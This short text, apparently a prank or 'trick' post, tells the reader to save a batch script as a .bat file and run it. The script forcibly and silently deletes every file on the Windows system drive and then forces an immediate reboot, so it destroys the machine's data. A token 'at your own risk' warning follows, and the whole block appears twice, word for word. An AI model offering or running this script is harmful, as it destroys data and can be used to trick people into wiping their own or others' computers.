Type the following codes in notepad and save it by .bat extension and run it:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Warning:
It may damage your system or data. Try at your own risk.
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Warning:
It may damage your system or data. Try at your own risk.